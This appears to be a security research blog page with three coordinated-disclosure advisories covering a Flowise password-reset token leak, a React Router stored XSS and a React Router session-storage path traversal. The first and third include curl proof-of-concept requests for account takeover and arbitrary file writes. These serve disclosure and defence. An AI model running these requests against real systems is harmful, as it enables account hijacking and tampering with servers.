Critical | Account Takeover | CVE-2025-58434

Published September 4, 2025

Critical Flowise Account Takeover via Password Reset Token Disclosure

BugBunny.ai identified a vulnerability that leaks password-reset tokens for any Flowise Cloud or self-hosted user, enabling full account takeover with nothing more than an email address. Flowise—the no-code LLM orchestration platform with 43k+ GitHub stars and recently acquired by Workday—worked with us to remediate the issue ahead of public disclosure.


TL;DR

Account takeover across Flowise Cloud & local installs

  • Impact: Complete account takeover (ATO) with no authentication.
  • Root Cause: forgot-password API leaked live reset tokens.
  • Surface: Flowise Cloud (SaaS) and any self-hosted instance.
  • Status: Fixed in v3.0.6 with coordinated disclosure.

Summary

Flowise exposes a public password-reset endpoint at /api/v1/account/forgot-password. Instead of issuing a confirmation email, the API responded with a fully hydrated user object, including a valid password reset tempToken. An attacker only needed a target email address to request the token and immediately reset the victim's password via /api/v1/account/reset-password.

The bug affected both the hosted cloud environment and any community deployment that exposed these routes. Because Flowise often powers customer-facing automation, compromise of a single account could expose integrations, API keys, prompt libraries, and downstream systems.

Proof of Concept

The attack requires two requests. First, trigger the password reset flow for any email. The response contains the temporary token. Then, immediately reset the password using that token—no mailbox access, user confirmation, or prior authentication required.

# Request 1: trigger the reset flow for the target email address
curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

# Response excerpt (201 Created): the live reset token is returned to the caller
{
  "user": {
    "id": "<redacted-uuid>",
    "email": "<victim@example.com>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z"
  }
}

# Request 2: reset the password using the leaked tempToken
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<victim@example.com>",
          "tempToken":"<redacted-tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'

Remediation Guidance

  • Send reset tokens exclusively through the registered email channel—never return them in API responses.
  • Harden forgot-password to respond generically and avoid user/email enumeration.
  • Scope tokens to a single request, enforce short expiries, and bind them to the requesting IP/device when feasible.
  • Mirror fixes in both cloud and on-premise deployments, and advise customers to upgrade to Flowise v3.0.6 or later.
  • Instrument logging for anomalous reset traffic; alert on bulk or repeated requests per account.
  • Consider MFA or stepped-up verification for administrative or high-value accounts.

Credits & Timeline

Vulnerability discovered by BugBunny.ai researchers and reported to Flowise under responsible disclosure. Flowise acknowledged the issue, issued patch v3.0.6, and coordinated CVE-2025-58434 alongside our team.

Reporter: @zaddy6
Publication: GHSA-wgpv-6j63-x5ph

High | Stored XSS | CVE-2025-59057

Published September 10, 2025

Stored XSS in React Router Input Handling

React Router, the ubiquitous navigation library serving more than 90 million weekly downloads, is affected by a stored cross-site scripting issue under specific input handling conditions. Crafted payloads persisted in route state can execute automatically for downstream users.


TL;DR

Persistent script execution from crafted route data

  • Impact: Stored XSS leading to session hijack, credential theft, or unauthorized actions.
  • Vector: Untrusted route parameters injected into rendered outlets without sanitisation.
  • Surface: Applications persisting user-controlled values via loaders/actions across navigations.
  • Status: Fixed in React Router 7.1.2 with stricter escaping of route state.

Summary

When applications persisted user-controlled data in navigation state and later rendered that state via custom route loaders, React Router skipped escaping for HTML content. Attackers could craft payloads that stored <script> fragments in the router state, triggering execution for any user who later visited the poisoned route.

The vulnerability affects both classic data routers and the newer simplified APIs. Applications exposing public submission endpoints and reflecting values back through loaders/actions are at risk if unescaped values are rendered.

Mitigation

  • Upgrade to React Router 7.1.2 or later, or apply the upstream patch to earlier major versions.
  • Sanitize and encode any user-controlled data before rendering in route outlets or meta loaders.
  • Review custom navigation helpers that bypass built-in sanitisation.
  • Deploy a strict Content Security Policy (CSP) to reduce impact even if an injection lands.

Credits & Disclosure

Identified by the BugBunny.ai research team and reported privately to the React Router maintainers. The fix shipped within 12 days, with coordinated public disclosure on npm and GitHub.

Reporter: BugBunny.ai Research
Maintainer Fix: React Router 7.1.2

High | Path Traversal | CVE-2025-61686

Published October 2, 2025

React Router File Session Storage Path Traversal

BugBunny.ai identified that React Router's createFileSessionStorage trusted session IDs when deriving file paths. Attackers who can influence the session identifier can escape the configured storage directory and overwrite arbitrary files on disk, from application configuration to deployment scripts. The issue impacts any server using the file session store—including Remix apps—and has now been patched and assigned CVE-2025-61686.


TL;DR

Directory escape via crafted session identifiers

  • Impact: Arbitrary file overwrite/read using attacker-controlled session IDs.
  • Vector: Path traversal in the session storage filename normalisation.
  • Surface: Node servers using createFileSessionStorage (Remix & React Router).
  • Status: Fixed in React Router 7.2.0 with strict path sanitisation.

Summary

Session files are stored on disk using the provided session ID as part of the filename. By inserting traversal sequences (e.g. ../../../../) an attacker can pivot out of the session directory and point the storage layer at arbitrary paths. On subsequent writes the framework will happily overwrite sensitive files, or allow the attacker to drop a malicious script that is executed on the next deploy.

Hosting providers using persistent volumes are especially exposed: a single malicious request can replace configuration, modify edge handlers, or poison build artefacts. Log inspection also becomes difficult because the session middleware reports a 200 OK response.

Proof of Concept

The following request uses a traversal sequence to escape the session directory and plant an arbitrary JSON file in /tmp. A second request can then read or overwrite other files in the same manner.

curl -i -X POST https://<target>/__session/../../../../tmp/owned.json \
  -H "Content-Type: application/json" \
  -d '{
        "id":"../../../../tmp/owned.json",
        "data":{"role":"admin","note":"BugBunny was here"}
      }'

# Result: arbitrary file created/overwritten outside the session directory.

Mitigation

  • Upgrade to React Router / Remix releases that patch CVE-2025-61686 (7.2.0+).
  • Reject or regenerate session IDs supplied by untrusted clients.
  • Run the application with a dedicated, permissions-restricted session directory.
  • Consider switching to cookie or database-backed session storage where feasible.

Credits & Disclosure

Reported privately to the React Router maintainers with a working exploit. A fix shipped within eight days, followed by a GitHub Security Advisory and npm deprecation notice for vulnerable releases.

Reporter: BugBunny.ai Research
Maintainer Fix: React Router 7.2.0


BugBunny Blog – Security Research | BugBunny.ai